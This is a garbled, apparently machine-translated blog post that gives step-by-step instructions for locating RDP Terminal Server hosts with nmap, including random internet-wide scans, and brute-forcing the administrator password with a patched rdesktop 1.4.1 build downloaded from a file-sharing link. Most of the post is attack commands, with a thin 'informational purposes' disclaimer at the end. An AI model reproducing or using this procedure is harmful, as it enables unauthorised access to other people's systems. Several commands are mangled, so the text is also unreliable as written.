I will describe how to find a little guide a Terminal Server service and perform a dictionary attack dintrun Linux.Metode system are many, here I will describe only one. I will use that tool for rdesktop 1.4.1. Linux will be added to make a patch for dictionary attack.
Rdesktop 1.4.1 pueti you find on the internet but this will put a link where you can take with tabs and a built-in patch
http://www.mediafire.com/?mdmttwfjjwh
The first thing you need to do is to find a terminal server, which is a default on TCP port 3389
You can use the following command for Nmap, or depends on what scanner you use.
Code:
TerminalServer.txt-oN nmap-p 3389 - open 192.168.0.0/24
where instead of 192.168.0.0/24 IPs you specify that you want to scanners. Nmap will save all tabs TerminalServer.txt meet.
Another command is:
Code:
PS3389-nmap-iR 0-p 3389 - open-oN TerminalServer.txt
instead of 0 put each ip you want to scan. (The default 0 will scan forever) And in this case saves everything TerminalService.txt Nmap, The - - is open to only show open service.
Once you have enough targets to phase No. 2 passing attack Dictionary.
Rdesktop-1.4.1.tar Download.
You have to remove the archive with the command
Code:
tar-xf rdesktop-1.4.1.tar
Then go where you opened the archive,
Code:
cd rdesktop-1.4.1
And give the following command for patch
Code:
patch-p1-i rdp-brute-force-r422.diff
Now you have to compile:
Code:
. / Configure
Code:
make
Code:
make install
after you have finished give rdesktop command and will show all the options.
Ex:
Code:
rdesktop-u administrator-p 192.168.1.1 pass.txt
dictionary of words which is pass.txt
An administator will set it so that some will allow only a few attempts and close the rest.
This is illegal, you should be licensed before doing a scan on any network.
Everything can be saved In a log file.
I wrote this guida informational purposes only knowing what makes the enemy can take action.
No comments:
Post a Comment